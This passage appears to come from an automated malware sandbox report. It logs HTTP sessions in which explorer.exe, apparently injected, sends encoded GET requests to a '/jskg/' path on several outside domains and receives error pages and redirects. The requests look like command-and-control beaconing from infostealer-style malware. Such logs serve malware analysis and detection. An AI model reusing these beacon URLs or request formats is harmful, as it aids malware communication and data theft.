65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Pleas
Nov 21, 2023 03:32:02.474838972 CET	205	IN	Data Raw: 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 Data Ascii: e be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49720	34.149.87.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:18.840590954 CET	207	OUT	GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lbarco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:18.947756052 CET	207	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Tue, 21 Nov 2023 02:32:18 GMT X-Served-By: cache-iad-kjyo7100101-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	34.149.87.45	80	192.168.2.5	49720	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:18.840590954 CET	207	OUT	GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lbarco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:18.947756052 CET	207	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Tue, 21 Nov 2023 02:32:18 GMT X-Served-By: cache-iad-kjyo7100101-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49721	217.160.0.167	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:42.602914095 CET	209	OUT	GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lacroixundkress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:42.798127890 CET	209	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Tue, 21 Nov 2023 02:32:42 GMT Server: Apache Cache-Control: no-cache Location: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	217.160.0.167	80	192.168.2.5	49721	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:42.602914095 CET	209	OUT	GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lacroixundkress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:42.798127890 CET	209	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Tue, 21 Nov 2023 02:32:42 GMT Server: Apache Cache-Control: no-cache Location: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	23.227.38.74	80	192.168.2.5	49722	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:47.926567078 CET	210	OUT	GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.saraadamchak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:48.063898087 CET	211	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:32:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:33:02 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0Q2pTZmb8uR3ituotWcihVxyPQrSYnZIY93E3ajzRG67Kyly0iJn1NeYllgOaoyveTmmmo6vEHy0saGUSqpvK3tGGiMXqOvgolY4gdNrN5eL75KIF7l9k0xJAxsZzo1R1lJ5twk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=10.999918 Server: cloudflare CF-RAY: 82958633cd4657c4-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofol
Nov 21, 2023 03:32:48.063942909 CET	213	IN	Data Raw: 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e Data Ascii: low" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles
Nov 21, 2023 03:32:48.063981056 CET	214	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="
Nov 21, 2023 03:32:48.064034939 CET	215	IN	Data Raw: 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 Data Ascii: 00"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">82958633cd4657c4</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-foote
Nov 21, 2023 03:32:48.064069986 CET	216	IN	Data Raw: 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49722	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:47.926567078 CET	210	OUT	GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.saraadamchak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:48.063898087 CET	211	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:32:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:33:02 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0Q2pTZmb8uR3ituotWcihVxyPQrSYnZIY93E3ajzRG67Kyly0iJn1NeYllgOaoyveTmmmo6vEHy0saGUSqpvK3tGGiMXqOvgolY4gdNrN5eL75KIF7l9k0xJAxsZzo1R1lJ5twk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=10.999918 Server: cloudflare CF-RAY: 82958633cd4657c4-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofol
Nov 21, 2023 03:32:48.063942909 CET	213	IN	Data Raw: 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e Data Ascii: low" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles
Nov 21, 2023 03:32:48.063981056 CET	214	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="
Nov 21, 2023 03:32:48.064034939 CET	215	IN	Data Raw: 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 Data Ascii: 00"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">82958633cd4657c4</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-foote
Nov 21, 2023 03:32:48.064069986 CET	216	IN	Data Raw: 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	23.227.38.74	80	192.168.2.5	49723	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:33:19.042134047 CET	217	OUT	GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.erotictoybox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:33:19.183007002 CET	218	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:33:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:33:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4DAWwtzAvJlPfepUXf0REHpRpg1KZxNlQmTEEg912%2B85hBib4Ig2ueyhZIBo3IBp0csP1An1oKj3iUwMIIIyL4ssmB931pkQ0tCLGYp4vFTBSg1TJIfhKEbnPR4ir3dLegP8gN3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=15.000105 Server: cloudflare CF-RAY: 829586f64f218287-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nof
Nov 21, 2023 03:33:19.183046103 CET	220	IN	Data Raw: 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c Data Ascii: ollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styl
Nov 21, 2023 03:33:19.183083057 CET	221	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class
Nov 21, 2023 03:33:19.183118105 CET	222	IN	Data Raw: 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f Data Ascii: -300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">829586f64f218287</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-foo
Nov 21, 2023 03:33:19.183171034 CET	223	IN	Data Raw: 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 Data Ascii: - /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49723	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:33:19.042134047 CET	217	OUT	GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.erotictoybox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
